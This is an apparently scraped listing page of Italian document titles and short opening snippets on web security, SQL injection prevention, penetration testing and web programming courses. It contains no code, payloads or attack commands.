$whois. Introduzione Attacco a una webapp Attacco a un sistema Conclusioni. http://voidsec.com voidsec@voidsec.com

$whois. Introduzione Attacco a una webapp Attacco a un sistema Conclusioni. http://voidsec.com voidsec@voidsec.com $whois Paolo Stagno Luca Poletti http://voidsec.com voidsec@voidsec.com Nell anno 2013: Aumento del 30% degli attacchi a siti e web application 14 zero-day 5,291 nuove vulnerabilità scoperte, 415 di queste

Dettagli

Elementi di Sicurezza e Privatezza Lezione 14 Web Security. Chiara Braghin

Elementi di Sicurezza e Privatezza Lezione 14 Web Security. Chiara Braghin Elementi di Sicurezza e Privatezza Lezione 14 Web Security Chiara Braghin Web, vulnerabilità e attacchi Attacchi comuni (2006) Cross-site scripting (XSS) 22% SQL Injection 14 % PHP Include 10% Buffer overflow

Dettagli

RSA Sun Insurance Office Ltd

RSA Sun Insurance Office Ltd RSA Sun Insurance Office Ltd Web Application Security Assessment (http://rsage49:9080/sisweb) Hacking Team S.r.l. Via della Moscova, 13 20121 MILANO (MI) - Italy http://www.hackingteam.it info@hackingteam.it

Dettagli

--- PREMESSE INTRODUZIONE. .:luxx:.

--- PREMESSE INTRODUZIONE. .:luxx:. SQL INJECTION --- SICUREZZA.:luxx:. PREMESSE Questa guida accenna ad alcuni metodi di SQL injection e si sofferma sulla prevenzione di tali attacchi, per comprendere al meglio il testo è necessaria una

Dettagli

Dettaglio dei corsi in aula

Dettaglio dei corsi in aula L offerta formativa Dettaglio dei corsi in aula Software Engineering Object Oriented Analysis and Design: fondamenti e principi dell object orientation. Dall analisi alla progettazione. I Design Pattern.

Dettagli

Sicurezza delle reti. Monga. L autenticazione in rete Password Altre credenziali OTP Metodi crittografici. Pericoli. Sicurezza delle reti.

Sicurezza delle reti. Monga. L autenticazione in rete Password Altre credenziali OTP Metodi crittografici. Pericoli. Sicurezza delle reti. 1 Mattia Lezione XIX: Dip. di Informatica e Comunicazione Università degli Studi di Milano, Italia mattia.monga@unimi.it a.a. 2010/11 1 c 2011 M.. Creative Commons Attribuzione-Condividi allo stesso modo

Dettagli

Corso di Web Programming

Corso di Web Programming Corso di Web Programming 1. Introduzione a Internet e al WWW Paolo Milazzo Dipartimento di Informatica, Università di Pisa http://www.di.unipi.it/ milazzo milazzo di.unipi.it Corso di Laurea in Informatica

Dettagli

KLEIS WEB APPLICATION FIREWALL

KLEIS WEB APPLICATION FIREWALL KLEIS WEB APPLICATION FIREWALL VERSIONE 2.1 Presentazione www.kwaf.it Cos'è Kleis Web Application Firewall? Kleis Web Application Firewall (KWAF) è un firewall software per la difesa di: Web Application

Dettagli

Protocolli di autenticazione ione per la connessione alle reti sociali. Le tecnologie del Web 2.0

Protocolli di autenticazione ione per la connessione alle reti sociali. Le tecnologie del Web 2.0 Protocolli di autenticazione ione per la connessione alle reti sociali Le tecnologie del Web 2.0 OAuth: cos è Semplice standard aperto per l autenticazione sicura delle API Protocollo aperto per permettere

Dettagli

Agenda. IT Security Competence Center Web Application Security. Web Application Security. Tito Petronio 03/03/2011

Agenda. IT Security Competence Center Web Application Security. Web Application Security. Tito Petronio 03/03/2011 IT Security Competence Center Web Application Security Tito Petronio SANS GCFA, GWAS Certified Professional 18 Febbraio 2011 Agenda Web Application Security OWASP Vulnerabilità delle Applicazioni Web Sicurezza

Dettagli

Luca Mari, Sistemi informativi applicati (reti di calcolatori) appunti delle lezioni. Da JavaScript a Java

Luca Mari, Sistemi informativi applicati (reti di calcolatori) appunti delle lezioni. Da JavaScript a Java Sistemi informativi applicati (reti di calcolatori): appunti delle lezioni Da JavaScript a Java Versione 3.4.05 Per la prima lezione in aula e la prima esercitazione in laboratorio 1 Da JavaScript a Java

Dettagli

VULNERABILITY ASSESSMENT E PENETRATION TEST

VULNERABILITY ASSESSMENT E PENETRATION TEST VULNERABILITY ASSESSMENT E PENETRATION TEST Una corretta gestione della sicurezza si basa innanzitutto su un adeguata conoscenza dell attuale livello di protezione dei propri sistemi. Partendo da questo

Dettagli

Università degli studi di Ferrara. Sviluppo di un Web Service per la classificazione del suolo e sua integrazione sul Portale SSE

Università degli studi di Ferrara. Sviluppo di un Web Service per la classificazione del suolo e sua integrazione sul Portale SSE Università degli studi di Ferrara Facoltà di scienze MM.FF.NN. Corso di Laurea Specialistica in Informatica Sviluppo di un Web Service per la classificazione del suolo e sua integrazione sul Portale SSE

Dettagli

(UN)SECURITY GUIDELINES. Best practice e linee guida per uno sviluppo sicuro e responsabile

(UN)SECURITY GUIDELINES. Best practice e linee guida per uno sviluppo sicuro e responsabile (UN)SECURITY GUIDELINES Best practice e linee guida per uno sviluppo sicuro e responsabile $whois Paolo Stagno Cyber Security Analist, idialoghi Luca Poletti Crazy Mathematician & Developer VoidSec.com

Dettagli

Protagonisti di INNOVAZIONE un progetto industriale unico in Italia

Protagonisti di INNOVAZIONE un progetto industriale unico in Italia Claudio De Paoli IT Security Practice Manager Un approccio innovativo alla sicurezza degli accessi ai servizi di ebanking Roma, gennaio 2011 Cybercrime: Costante aumento di Incidenti e frodi Il mercato

Dettagli

PHP. A. Lorenzi, R. Giupponi, D. Iovino LINGUAGGI WEB. LATO SERVER E MOBILE COMPUTING Atlas. Copyright Istituto Italiano Edizioni Atlas

PHP. A. Lorenzi, R. Giupponi, D. Iovino LINGUAGGI WEB. LATO SERVER E MOBILE COMPUTING Atlas. Copyright Istituto Italiano Edizioni Atlas PHP A. Lorenzi, R. Giupponi, D. Iovino LINGUAGGI WEB. LATO SERVER E MOBILE COMPUTING Atlas Copyright Istituto Italiano Edizioni Atlas Programmazione lato server PHP è un linguaggio che estende le funzionalità

Dettagli

La sicurezza secondo skymeeting (data pubblicazione 06/12/2011)

La sicurezza secondo skymeeting (data pubblicazione 06/12/2011) La sicurezza secondo skymeeting (data pubblicazione 06/12/2011) www.skymeeting.net La sicurezza nel sistema di videoconferenza Skymeeting skymeeting è un sistema di videoconferenza web-based che utilizza

Dettagli

venerdì 31 gennaio 2014 Programmazione Web

venerdì 31 gennaio 2014 Programmazione Web Programmazione Web WWW: storia Il World Wide Web (WWW) nasce tra il 1989 e il 1991 come progetto del CERN di Ginevra affidato a un gruppo di ricercatori informatici tra i quali Tim Berners- Lee e Robert

Dettagli

Introduzione al Web. dott. Andrea Mazzini

Introduzione al Web. dott. Andrea Mazzini Introduzione al Web dott. Andrea Mazzini Il servizio World Wide Web Il servizio Web è basato su particolari computer presenti nella rete, indicati come nodi Web, che rendono disponibili le informazioni

Dettagli

Ministero dell Istruzione dell Università e della Ricerca M070 ESAME DI STATO DI ISTITUTO TECNICO INDUSTRIALE

Ministero dell Istruzione dell Università e della Ricerca M070 ESAME DI STATO DI ISTITUTO TECNICO INDUSTRIALE Pag. 1/1 Sessione ordinaria 2010 Seconda prova scritta Ministero dell Istruzione dell Università e della Ricerca M070 ESAME DI STATO DI ISTITUTO TECNICO INDUSTRIALE CORSO DI ORDINAMENTO Indirizzo: INFORMATICA

Dettagli

Tecnologie e Programmazione Web

Tecnologie e Programmazione Web Presentazione 1 Tecnologie e Programmazione Web Html, JavaScript e PHP RgLUG Ragusa Linux Users Group SOftware LIbero RAgusa http://www.solira.org - Nunzio Brugaletta (ennebi) - Reti 2 Scopi di una rete

Dettagli

Internet: conoscerlo al meglio per usarlo meglio Primi passi con internet Browser Transazioni sicure Antivirus Firewall

Internet: conoscerlo al meglio per usarlo meglio Primi passi con internet Browser Transazioni sicure Antivirus Firewall Internet: conoscerlo al meglio per usarlo meglio Primi passi con internet Browser Transazioni sicure Antivirus Firewall Cosa serve per collegarsi? Un PC Un modem (router) Cosa serve per navigare? Un abbonamento

Dettagli

INFORMATICA. Applicazioni WEB a tre livelli con approfondimento della loro manutenzione e memorizzazione dati e del DATABASE.

INFORMATICA. Applicazioni WEB a tre livelli con approfondimento della loro manutenzione e memorizzazione dati e del DATABASE. INFORMATICA Applicazioni WEB a tre livelli con approfondimento della loro manutenzione e memorizzazione dati e del DATABASE. APPLICAZIONI WEB L architettura di riferimento è quella ampiamente diffusa ed

Dettagli

Questo punto richiederebbe uno sviluppo molto articolato che però a mio avviso va al di là delle possibilità fornite al candidato dal tempo a disposizione. Mi limiterò quindi ad indicare dei criteri di

Dettagli

@2011 Politecnico di Torino. Pag. 1. Architettura distribuita. Architetture Client/Server. Architettura centralizzata. Architettura distribuita

@2011 Politecnico di Torino. Pag. 1. Architettura distribuita. Architetture Client/Server. Architettura centralizzata. Architettura distribuita Architettura client/ stazioni utente Basi di ati Architetture /Server B locali M BG Architettura centralizzata Un architettura è centralizzata quando i dati e le (programmi) risiedono in un unico Tutta

Dettagli

Bibliografia: Utenti e sessioni

Bibliografia: Utenti e sessioni Bibliografia: Utenti e sessioni http: protocollo stateless http si appoggia su una connessione tcp e lo scambio nel contesto di una connessione si limita a invio della richiesta, ricezione della risposta.

Dettagli

SQL INJECTION. Details and Prevention. Programmazione Sicura. Giuseppe Pietravalle. Giuseppe Santaniello

SQL INJECTION. Details and Prevention. Programmazione Sicura. Giuseppe Pietravalle. Giuseppe Santaniello SQL INJECTION Details and Prevention Giuseppe Santaniello Giuseppe Pietravalle Programmazione Sicura A.A. 2014/2015 OWASP Open Web Application Security Project (OWASP) è un progetto open-source per la

Dettagli

Caratteristiche generali

Caratteristiche generali Caratteristiche generali Tecnologie utilizzate Requisiti software/hardware Modalità di installazione del database del PSDR INSTALLAZIONE PSDR Installazione on-line Installazione off-line Primo avvio Riservatezza

Dettagli

CAMPUS. fast fast fast nei Tempi, depth depth depth nella Formazione, solid solid solid nel Futuro.

CAMPUS. fast fast fast nei Tempi, depth depth depth nella Formazione, solid solid solid nel Futuro. ArToo Campus è una Scuola di eccellenza per formare eccellenze, che fa dell innovazione dirompente il suo credo. ARTOO CONTATTI Via 1 Maggio, 156 60131 ANCONA (AN) ITALY Tel +39 071 99 802 68* Fax +39

Dettagli

Approfondimenti. Il controllo di SQL Injection nelle pagine ASP e ASP.NET. U.A. 5 - Database in rete con le pagine ASP e ASP.

Approfondimenti. Il controllo di SQL Injection nelle pagine ASP e ASP.NET. U.A. 5 - Database in rete con le pagine ASP e ASP. U.A. 5 - Database in rete con le pagine ASP e ASP.NET 269 Il controllo di SQL Injection nelle pagine ASP e ASP.NET Approfondimenti Con il termine SQL Injection si intende l aggiunta di istruzioni SQL nell

Dettagli

PIANO DI LAVORO (a.s. 2015/2016)

PIANO DI LAVORO (a.s. 2015/2016) Istituto Tecnico Commerciale Statale e per Geometri E. Fermi Pontedera (PI) Via Firenze, 51 - Tel. 0587/213400 - Fax 0587/52742 http://www.itcgfermi.it E-mail: mail@itcgfermi.it PIANO DI LAVORO (a.s. 2015/2016)

Dettagli

BOLLETTINO DI SICUREZZA INFORMATICA

BOLLETTINO DI SICUREZZA INFORMATICA STATO MAGGIORE DELLA DIFESA II Reparto Informazioni e Sicurezza Ufficio Sicurezza Difesa Sezione Gestione del Rischio CERT Difesa CC BOLLETTINO DI SICUREZZA INFORMATICA N. 5/2008 Il bollettino può essere

Dettagli

ITI M. FARADAY Programmazione modulare a.s. 2014-2015

ITI M. FARADAY Programmazione modulare a.s. 2014-2015 Indirizzo: INFORMATICA E TELECOMUNICAZIONI Disciplina: Informatica Docente:Maria Teresa Niro Classe: Quinta B Ore settimanali previste: 6 (3 ore Teoria - 3 ore Laboratorio) ITI M. FARADAY Programmazione

Dettagli

Una minaccia dovuta all uso dell SNMP su WLAN

Una minaccia dovuta all uso dell SNMP su WLAN Una minaccia dovuta all uso dell SNMP su WLAN Gianluigi Me, gianluigi@wi-fiforum.com Traduzione a cura di Paolo Spagnoletti Introduzione Gli attacchi al protocollo WEP compromettono la confidenzialità

Dettagli